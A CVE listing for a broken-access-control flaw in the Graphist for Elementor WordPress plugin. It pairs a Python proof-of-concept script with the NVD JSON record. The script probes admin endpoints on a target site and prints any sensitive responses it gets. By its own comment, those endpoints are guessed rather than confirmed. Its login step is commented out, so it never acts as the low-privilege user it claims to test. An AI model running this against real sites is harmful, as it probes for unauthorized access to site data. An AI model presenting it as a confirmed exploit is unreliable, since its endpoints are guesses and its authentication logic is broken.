CVE-2025-66160

# CVE-2025-66160 PoC - Graphist Elementor Broken Access Control # Affected: Graphist Elementor <= 1.2.10 # This PoC demonstrates accessing admin-only functions as a low-privilege user import requests import sys TARGET_URL = "https://vulnerable-site.com" # Example endpoints that might be affected (based on typical Elementor plugin structure) VULNERABLE_ENDPOINTS = [ "/wp-json/graphist/v1/settings", "/wp-admin/admin-ajax.php?action=graphist_get_data", "/wp-json/graphist/v1/graphs" ] def check_vulnerability(): """ Test if the Graphist Elementor plugin is vulnerable to CVE-2025-66160 by attempting to access privileged endpoints with a low-privilege user's session. """ print("[*] Testing for CVE-2025-66160 - Missing Authorization in Graphist Elementor") print(f"[*] Target: {TARGET_URL}") # Setup session with low-privilege user credentials session = requests.Session() # Note: Replace with actual low-privilege user credentials # login_data = {'username': 'subscriber_user', 'password': 'password'} # session.post(f"{TARGET_URL}/wp-login.php", data=login_data) for endpoint in VULNERABLE_ENDPOINTS: url = f"{TARGET_URL}{endpoint}" try: response = session.get(url, timeout=10) # Check if we can access admin-only functionality if response.status_code == 200: # Check response content for sensitive data if '"admin"' in response.text or '"settings"' in response.text: print(f"[+] VULNERABLE: {url} - Access granted without proper authorization") print(f"[+] Response preview: {response.text[:200]}...") return True elif response.status_code == 403: print(f"[-] Protected: {url} - Access denied (expected behavior)") else: print(f"[*] Endpoint: {url} - Status: {response.status_code}") except requests.RequestException as e: print(f"[!] Error testing {url}: {e}") print("[*] Vulnerability check completed") return False if __name__ == "__main__": check_vulnerability()

{"cve": {"id": "CVE-2025-66160", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:50.783", "lastModified": "2026-04-23T15:35:29.300", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Select Graphist for Elementor\t Graphist for Elementor graphist-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Select Graphist for Elementor\t Graphist for Elementor: from n/a through <= 1.2.10."}, {"lang": "es", "value": "Vulnerabilidad de Autorización faltante en merkulove Select Graphist for Elementor Graphist for Elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Select Graphist for Elementor Graphist for Elementor: desde n/a hasta 1.2.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/graphist-elementor/vulnerability/wordpress-select-graphist-for-elementor-graphist-for-elementor-plugin-1-2-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}